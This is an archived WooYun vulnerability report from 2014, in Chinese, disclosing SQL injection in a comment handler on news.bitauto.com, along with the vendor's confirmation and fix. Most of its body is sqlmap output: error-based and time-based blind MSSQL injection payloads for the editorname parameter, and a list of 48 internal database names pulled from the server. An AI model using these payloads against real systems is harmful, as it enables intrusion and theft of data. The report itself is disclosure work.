乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-24: 细节已通知厂商并且等待厂商处理中 2014-11-24: 厂商已经确认,细节仅向厂商公开 2014-12-04: 细节向核心白帽子及相关领域专家公开 2014-12-14: 细节向普通白帽子公开 2014-12-24: 细节向实习白帽子公开 2015-01-08: 细节向公众公开
好久没挖煤了。。。
某几处存在SQL注射,就这个能利用下。泄露的库不少!
http://news.bitauto.com/comment/iCommentByEditorHandler.aspx?editorname=---Place: GETParameter: editorname Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: editorname=' AND 1842=CONVERT(INT,(SELECT CHAR(113)+CHAR(99)+CHAR(110)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (1842=1842) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(104)+CHAR(110)+CHAR(113))) AND 'QcED'='QcED Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: editorname=' AND 6852=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'isdN'='isdN---back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: editorname Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: editorname=' AND 1842=CONVERT(INT,(SELECT CHAR(113)+CHAR(99)+CHAR(110)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (1842=1842) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(104)+CHAR(110)+CHAR(113))) AND 'QcED'='QcED Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: editorname=' AND 6852=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'isdN'='isdN---back-end DBMS: Microsoft SQL Serveravailable databases [48]:[*] APIMS[*] ASearch2009[*] Atemp[*] AutoSecurity[*] AutoStorageNew[*] AutoWeeklyDB[*] bitauto_Log[*] BitAutoCarEstimate[*] BitAutoCMS2009[*] BitautoCommentV3[*] BitAutoEMS2010[*] BitAutoFLS2011[*] BitAutoWap[*] CarsDataAutoHome[*] CarsDataV2[*] citybase[*] CMS_SNS[*] CMSBlock[*] CMSPartner[*] CMSStat[*] CorpCMS[*] cssms[*] DBSpride[*] ErrorReport[*] Examine[*] FeedBack[*] FSAE[*] IPExtData[*] LiveVideo[*] master[*] model[*] msdb[*] NewsSprider[*] NoahOAuth[*] OperationSystem2007[*] PeopleLib[*] PeopleLib2014[*] PriceSearch_AD[*] PriceStat[*] RoleAnalysis[*] SMSPlatform[*] tempdb[*] topic[*] VideoBase[*] VideoBase2013[*] VideoForum[*] VideoProcessState[*] Vote自己查看。。。
欢迎入住乌云!O__O"…
危害等级:高
漏洞Rank:15
确认时间:2014-11-24 14:49
非常感谢提供的漏洞,我们会尽快处理
2014-11-24:已经修复了该漏洞,谢谢